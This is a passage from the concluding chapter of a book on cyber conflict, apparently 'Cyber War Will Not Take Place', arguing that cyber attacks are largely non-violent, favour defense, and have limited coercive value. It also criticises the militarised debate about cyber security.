then the very notion of war would be diluted into a metaphor, as in the 
“war” on obesity. Fourth, cyberspace is not a separate domain of military 
activity. Instead the use of computer networks permeates all other 
domains of military conflict, land, sea, air, and space. To an extent, that 
has always been the case for the other domains as well. But in the case 
of IT security an institutional division of labor is far more difficult to 
implement, especially in a military context: the air force doesn’t have 
tanks, the army has no frigates, but everybody has computer-run com- 
mand-and-control networks. Finally, cyberspace is not even space. 
Cyberspace is a now-common metaphor to describe the widening 
reaches of the Internet. “Firewall” and “surfing” the web are other well- 
established and widely accepted spatial metaphors. Saying the air force 
“flies” in cyberspace is like the army training troops to “scale” firewalls 
or the navy developing new “torpedoes” to hit some of those surfing the 
web. In fact the very idea of “flying, fighting, and winning ... in cybers¬ 
pace,” enshrined in the US Air Force’s mission statement, is so ill-fitting 
that some serious observers can only find it faintly ridiculous—an orga¬ 
nization that wields some of the world’s most terrifying and precise 
weapons should know better. The debate on national security and 
defense would be well served if debating war was cut back to the time- 
tested four domains. After all there is no cyber attack, not even the 
over-cited Stuxnet, which unequivocally represents an act of war on its 
own. No cyber offense has ever caused the loss of human life. No cyber 
offense has ever injured a person. No cyber attack has ever seriously 
damaged a building. 

Once the distraction of the “fifth domain of warfare” is moved out of 
the way, five fundamental and largely novel conclusions become visible. 

The first and main conclusion, and this book’s core argument, is that 
the rise of cyber offenses represents an attack on violence itself. Almost 
all cyber attacks on record are non-violent. Those cyber attacks that 
actually do have the potential to inflict physical violence on machines or 
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humans can do so only indirectly, as chapter two argued in detail: so far, 
violence administered through cyberspace is less physical, less emotio¬ 
nal, less symbolic, and less instrumental than more conventional uses of 
political violence. This applies in all three main areas where political 
cyber attacks appear: sabotage operations may be violent or, in the majo¬ 
rity of cases on record, non-violent. The higher the technical develop¬ 
ment and the dependency of a society, the higher the potential for both 
violent and non-violent cyber sabotage. This has double significance: it 
is easier to distinguish between violence and non-violence, and it is 
more likely that saboteurs choose non-violence over violence. Espionage 
operations seem to be making less use of personnel trained in the mana¬ 
gement of violence than in the pre-Internet age. To an extent, experts in 
the use of code are replacing experts in the use of force, though only in 
relative terms and at a price. Finally, subversion has changed. The early 
phases of subversively undermining an established authority require less 
violence than before, but turning a budding subversive movement into 
a revolutionary success has become more difficult. Technology seems to 
have lowered the entry costs while raising the costs of success. Yet cyber 
attacks of all strands, even in their predominantly non-violent ways, 
may achieve a goal that previously required some form of political vio¬ 
lence: to undermine the collective social trust in specific institutions, 
systems, organizations, or individuals. And cyber attacks, whether exe¬ 
cuted by a state or by non-state groups, may undermine social trust, 
paradoxically, in a more direct way than political violence: through a 
non-violent shortcut. 

The second conclusion concerns the balance between defense and 
offense in the context of cyber attacks. Most conventional weapons may 
be used defensively and offensively. But the information age, the argu¬ 
ment goes, has “offence-dominant attributes.” 6 A 2011 Pentagon report 
on cyberspace still stressed “the advantage currently enjoyed by the 
offense in cyberwarfare.” 7 Cyber attack, proponents of the offense-domi¬ 
nance school argue, increases the attacker’s opportunities and the 
amount of damage to be done while decreasing the risks (sending special 
code is easier than sending Special Forces). 8 The attribution problem 
unquestionably plays into the hands of the offense, not the defense. 
Ffence expect more sabotage and more saboteurs. 

But adherents of the offense-dominance ideology should reconsider 
their arguments, for three different reasons: one is that when it comes to 
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cyber weapons, the offense has to deal with a set of costs and difficulties 
that the defense does not have to deal with. One implicit assumption of 
the offense-dominance school is that cyberspace favors the weak. But 
cyber attack may also favor strong and rich countries in unexpected 
ways: the Idaho National Laboratory, for instance, has many of the 
mainstream industrial control systems installed on range, in order to test 
them, find vulnerabilities, and build stronger defensive systems. But the 
same testing environment is also a tremendous offensive asset. By the 
time engineers have understood how to fix something, they also know 
how to break it. In addition to this, some installations are highly expen¬ 
sive to simulate and to install in a testing environment, for instance the 
control systems used in complex and highly bespoke refineries. At the 
same time only very few systems are used in refineries. This means that 
only a country that has this capability may be in a position to attack that 
capability elsewhere—this could limit the number of potential attac¬ 
kers. 9 Cyber sabotage with serious destructive potential is therefore 
possibly even more labor intensive than the brick-and-mortar kind, even 
if the required resources are dwarfed by the price of complex conventio¬ 
nal weapon systems. 10 Vulnerabilities have to be identified before they 
can be exploited; complex industrial systems need to be understood first; 
and a sophisticated attack vehicle may be so fine-tuned to one specific 
target configuration that a generic use may become impracticable— 
consider a highly sophisticated rocket that can only be fired against one 
single building and at nothing else, and it can only be fired once the 
attacker knows precisely what’s inside that building. The target set of a 
cyber weapon is therefore more limited than commonly assumed—the 
reverse is true for robust defenses. 

Another reason is that, when it comes to cyber weapons, the offense 
has a shorter half-life than the defense. 11 Clandestine attacks may have 
an unexpectedly long life-cycle, as Stuxnet and especially Flame illustra¬ 
ted. But weaponized code that is designed to maximize damage, not 
stealth, is likely to be more visible. If an act of cyber war was carried out 
to cause significant damage to property and people, then that attack 
would be highly visible by definition. As a result it is highly likely that 
the malicious code would be found and analyzed, probably even publi¬ 
cly by anti-virus companies and the software vendors that provide the 
attacked product. The exploits that enabled the attack would then most 
likely be patched and appropriate protections put in place. Yet political 


168 


BEYOND CYBER WAR 


crises may stretch out for many weeks, months, or even years. Updated 
defenses would make it very difficult for the aggressor to repeat an 
attack. But any threat relies on the offender’s credibility to attack, or to 
repeat a successful attack. If a potent cyber weapon is launched success¬ 
fully once, it is questionable if an attack, or even a salvo, could be 
repeated in order to achieve a political goal. The problem of repetition 
reduces the coercive utility of destructive cyber attacks. 

The final factor favoring the defense is the market. One concern is 
that sophisticated malicious actors could resort to asymmetric methods, 
such as employing the services of criminal groups, rousing patriotic hac¬ 
kers, and potentially redeploying generic elements of known attack tools. 
Worse, more complex malware is likely to be structured in a modular 
fashion. Modular design could open up new business models for 
malware developers. In the car industry, for instance, 12 modularity trans¬ 
lates into the possibility of a more sophisticated division of labor. Com¬ 
petitors can work simultaneously on different parts of a more complex 
system. Modules could be sold on underground markets. But even if this 
analysis is correct, emerging vulnerability markets pose a limited risk: the 
highly specific target information and programming design needed for 
potent weapons is unlikely to be traded generically. To go back to the 
imperfect analogy of chapter four: paintball pistols will continue to be 
commercially available, not intelligence devouring preprogrammed 
warheads of virtual, one-shot smart missiles. At the same time the mar¬ 
ket on the defensive side is bullish: the competition between various 
computer security companies has heated up, red-teaming is steadily 
improving, active defense is emerging, and very slowly but notably consu¬ 
mers are becoming more security aware. 

Once the arguments are added up, it appears that cyberspace does not 
favor the offense, but actually has advantages for the defense in stock. 
What follows may be a new trend: the level of sophistication required to 
find an opportunity and to stage a successful cyber sabotage operation 
is rising. The better the protective and defensive setup of complex sys¬ 
tems, the more sophistication, the more resources, the more skills, the 
more specificity in design, and the more organization is required from 
the attacker. Only very few sophisticated strategic actors may be able to 
pull off large-scale sustained computer sabotage operations. A thorough 
conceptual analysis and a detailed examination of the empirical record 
corroborates one central hypothesis: developing and deploying potenti- 
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ally destructive cyber weapons against hardened targets will require 
significant resources, hard-to-get and highly specific target intelligence, 
and time to design, test, prepare, launch, execute, maintain, and assess 
an attack. Successfully attacking the most highly secured targets would 
probably require the resources or the support of a state actor; terrorists 
are unlikely culprits of an equally unlikely cyber-9/11. 

The third conclusion is about the ethics of cyber attacks. If cyber 
attacks reduce the amount of violence inherent in conflict, rather than 
increase it, then this analysis opens a fresh viewpoint on some important 
ethical questions. Some observers have suggested creating an agreement 
like the Geneva Conventions to limit the use of weaponized code. 13 
Often such demands reach back to comparisons to the Cold War and 
nuclear weapons. Lor example: Brent Scowcroft, a cold warrior who 
served presidents Gerald Ford and George H.W. Bush, addressed a 
group of experts and students at Georgetown University in March 2011. 
The Cold War and cyber security are “eerily similar,” said Scowcroft, 
arguing that the US-Soviet arms control treaties should serve as a blue¬ 
print for tackling cyber security challenges. “We came to realize nuclear 
weapons could destroy the world and cyber can destroy our society if it’s 
not controlled,” a nouning Snowcroft told his Georgetown audience. 14 
Many views along similar lines could be added, and several academic 
articles have attempted to extract useful Cold War parallels. 15 Naturally, 
avoiding the “destruction of our society” at all costs appears as the ethi¬ 
cally correct choice. Many observers naturally fall back into well-esta¬ 
blished patterns of thought: striving for an international treaty to stop 
the impending “cyber arms race” or trying to apply jus ad bellum to acts 
of war that have not taken place. 16 But lazy and loose comparisons can¬ 
not replace sober and serious analysis—nuclear analogies are almost 
always flawed, unhelpful, and technically misguided. 17 

Once cyber attacks are broken down into their three strains, sounder 
ethical considerations become possible. Subversion is the most critical 
activity. It is probably impossible to find much common ground on this 
question between the United States and the European Union on the one 
hand and the authoritarian political regimes in Russia or China on the 
other—and it would be ethically unacceptable to make compromises. 
Russia and China have famously suggested finding such a compromise 
in the form of an “International code of conduct for information secu¬ 
rity,” laid out in a letter to the United Nations Secretary-General on 12 
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September 2011. One of the core tenets of this suggested code was 
“respect for sovereignty” online in order to “combat” criminal and ter¬ 
rorist activities that use the Internet. The goal: curbing the dissemina¬ 
tion of information that incites extremism, secessionism, and 
“disturbance.” Unnerved by the web-driven Arab revolutions, China and 
Russia wanted to set the international stage for better counter-subver¬ 
sion at home, as became evident during the World Conference on Inter¬ 
national Telecommunications (WCIT) in Dubai, United Arab Emirates, 
in early December 2012. 

Yet for liberal democracies, the most normatively crucial question is 
a very different one. The question is not how to curb subversion, but 
how to maintain the right forms of subversion that enable democratic 
as well as entrepreneurial self-renewal: how should a free and open libe¬ 
ral democracy draw and renegotiate the line between regenerative sub¬ 
version, which is enshrined in the constitution of truly free countries, 
and illegal subversive activities? This fine line has evolved over hundreds 
of years in liberal democracies, along with the tacit understanding that 
at rare but important junctures illegal activity can be legitimate activity. 
This line will have to be carefully reconsidered under the pressure of new 
technologies that may be used to extend control as well as to protest and 
escape control. The real risk for liberal democracies is not that these 
technologies empower individuals more than the state; the long-term 
risk is that technology empowers the state more than individuals, thus 
threatening to upset a carefully calibrated balance of power between 
citizens and the governments they elect to serve them. 

The ethics of sabotage look very different. Weaponized code, or cyber 
attacks more generally, may achieve goals that previously would have 
required the use of conventional force. This analysis has also argued that 
the most sophisticated cyber attacks are highly targeted, and that cyber 
weapons are unlikely to cause collateral damage in the same way as 
conventional weapons. Therefore, from an ethical point of view, the use 
of computer attack in many situations is clearly preferable to the use of 
conventional weapons: a cyber attack may be less violent, less traumati¬ 
zing, and more limited. Sabotage through weaponized code, in short, is 
likely to be more ethical than an airstrike, a missile attack, or a Special 
Forces raid. Something comparable applies to the ethics of cyber espio¬ 
nage. Again the use of computer attack as a tool of statecraft has to be 
compared with its alternatives, not with taking no action at all. Juxtapo- 


171 


CYBER WAR WILL NOT TAKE PLACE 


sing the alternatives is useful: intelligence may be gained by infiltrating 
computer systems and intercepting digital signals—or intelligence may 
be acquired by infiltrating human spies into hostile territory at personal 
risk, possibly armed, or by interrogating suspects under harsh condi¬ 
tions. Depending on the case and its context, computer espionage may 
be the ethically safer choice. The major problems are not ethical, but 
operational. This leads to the next conclusion. 

The fourth conclusion is the most sobering one—it concerns the star¬ 
kly limiting subtext of stand-alone cyber attacks. 18 A state-sponsored 
cyber attack on another state sends a message in the subtext. The best- 
known and most successful example is Stuxnet. An assessment of this 
technically impressive operation has to be put into the larger strategic 
context: it was designed to slow and delay Iran’s nuclear enrichment 
program, and undermine the Iranian government’s trust in its ability to 
develop a nuclear weapon. Yet, firstly, it long remained unclear and 
controversial how successful the designers of Stuxnet were in this res¬ 
pect—it was probably clearer for the Iranians themselves. What is clear 
for outsiders, though, is that Stuxnet did not succeed in stopping Iran or 
denting the regime’s determination to develop a nuclear weapons capa¬ 
bility. Several countries, secondly, pursued a number of policies vis-a-vis 
Iran in order to prevent the Islamic Republic from acquiring nuclear 
weapons. The instruments range from diplomacy, negotiations and sanc¬ 
tions of various sorts to covert operations, the assassination of nuclear 
scientists (and others), military threats, and ultimately to air strikes 
against key Iranian installations. Cyber attacks are only one instrument 
among many, hocusing on cyber attacks with questionable efficiency, 
and possibly with an AC/DC soundtrack, therefore runs the risk of sen¬ 
ding a counterproductive message to the Iranians in the subtext: were 
alert and technically sophisticated, but were not really serious about attac- 
kingyou if you cross a red line. A stand-alone cyber attack, especially done 
clandestinely and in a fashion that makes it impossible or nearly impos¬ 
sible to identify the attacker in situ , can be executed from a safe distance. 
Such an attack does not put the lives of service personnel at risk—there¬ 
fore the political stakes are by definition lower than in a conventional 
operation. It is useful to remember the Cold War-logic of the trip-wire 
here. Throughout the Cold War, substantial numbers of American 
ground forces were stationed in West Germany and elsewhere to make a 
credible statement to the Soviet Union in the subtext: we’re alert and 
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technically sophisticated, and were really serious about attacking you if you 
cross a redline. lcl The White House credibly demonstrated its seriousness 
by putting the lives of American citizens on the line. Cyber attacks could 
yield very valuable intelligence, no doubt. But from a political vantage 
point their coercive utility is far more questionable. Based on the empi¬ 
rical record and on a technical analysis, the political instrumentality of 
cyber attacks has been starkly limited and is likely to remain starkly 
limited. Paradoxically this effect is enhanced by the wide gulf between 
hype and reality, as those at the receiving end of cyber sabotage hear a lot 
of noise but feel (comparatively) little pain. Put simply, cyber sabotage 
attacks are likely to be less efficient than commonly assumed. 

The final conclusion is about the reaction, about countermeasures to 
cyber attacks. Senator John McCain commented on the failed Cyberse¬ 
curity Act of 2012 over the summer that year. The prominent national 
security leader had voted against the proposed bill: “As I have said time 
and time again, the threat we face in the cyber domain is among the 
most significant and challenging threats of twenty-first-century warfare.” 
Early in 2013 the Pentagon announced that it would boost the staff of 
its Cyber Command from 900 to 4,900 people, mostly focused on the 
offense. The use of such martial symbolism points to a larger problem: 
the militarization of cyber security. 20 William Lynn, the Pentagon’s num¬ 
ber two until October 2011, responded to critics by pointing out that 
the Department of Defense would not “militarize” cyberspace. “Indeed,” 
Lynn wrote, “establishing robust cyberdefenses no more militarizes 
cyberspace than having a navy militarizes the ocean.” 21 There is one 
major problem with such statements. 

The US government, as well as many other governments, has so far 
failed to establish robust cyberdefenses. Robust defenses against sabotage 
mean hardening computer systems, especially the systems that are 
moving stuff around, from chemicals to trains—but the actual security 
standards of the systems that run the world’s industrial and critical 
infrastructure continued to be staggeringly low in 2013. Robust defenses 
against espionage mean avoiding large-scale exfiltration of sensitive data 
from companies and public agencies—but Western intelligence agencies 
are only beginning to understand counter-espionage and the right use 
of human informants in a digitized threat environment. Robust defenses 
against subversion finally mean maintaining social stability by strengthe¬ 
ning the Internet’s openness and the citizen participation in political 
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process—the best insurance against degenerative subversion is allowing 
and even protecting regenerative subversion. If militarizing cyberspace 
means establishing robust cyber defenses, then cyberspace has not been 
“militarized.” What has been militarized is the debate about cyberspace. 
One result is that the quality of this debate dropped, or, more accurately, 
never rose to the level that information societies in the twenty-first cen¬ 
tury deserve. This book has argued that this remarkable double-standard 
is not merely a coincidence. What appears as harmless hypocrisy masks 
a knotty causal relationship: loose talk of cyber war overhypes the 
offenses and blunts the defenses. 

In the 1950s and 1960s, when Giraudoux’s play was translated into 
English, the world faced another problem that many thought was inevi¬ 
table: nuclear exchange. Herman Kahn, Bill Kaufmann, and Albert 
Wohlstetter were told that nuclear war could not be discussed publicly, 
as Richard Clarke pointed out in his alarmist book, Cyber War. He 
rightly concluded that, as with nuclear security, there should be more 
public discussion on cyber security because so much of the work has 
been stamped secret. This criticism is justified and powerful: too often 
countries as well as companies do not share enough data on vulnerabi¬ 
lities as well as capabilities. Of course there are limits to transparency 
when national security and corporate revenue is at stake. But democratic 
countries deserve a public debate on cyber security that is far better 
informed than the status quo. Open systems, no matter whether we are 
talking about a computer’s operating system or a society’s political sys¬ 
tem, are more stable and run more securely. The stakes are too high to 
just muddle through. 

The Pearl Harbor comparison and the Hiroshima analogy point to 
another limitation: unlike the nuclear theorists of the 1950s, cyber war 
theorists of the 201 Os have never experienced the actual use of a deadly 
cyber weapon, let alone a devastating one like “Little Boy.” There was 
no and there is no Hiroshima of cyber war. Based on a careful evaluation 
of the empirical record, based on technical detail and trends, and based 
on the conceptual analysis presented here, a future cyber-Hiroshima 
must be considered highly unlikely. It is about time for the debate to 
leave the realm of myth and fairytale—to a degree, serious experts have 
already moved on, and the political debate in several countries is begin¬ 
ning to follow their lead. Cassandra, it is true, was right at the end and 
had the last word in the famous Greek myth. But then, did the Trojan 
War really take place? 
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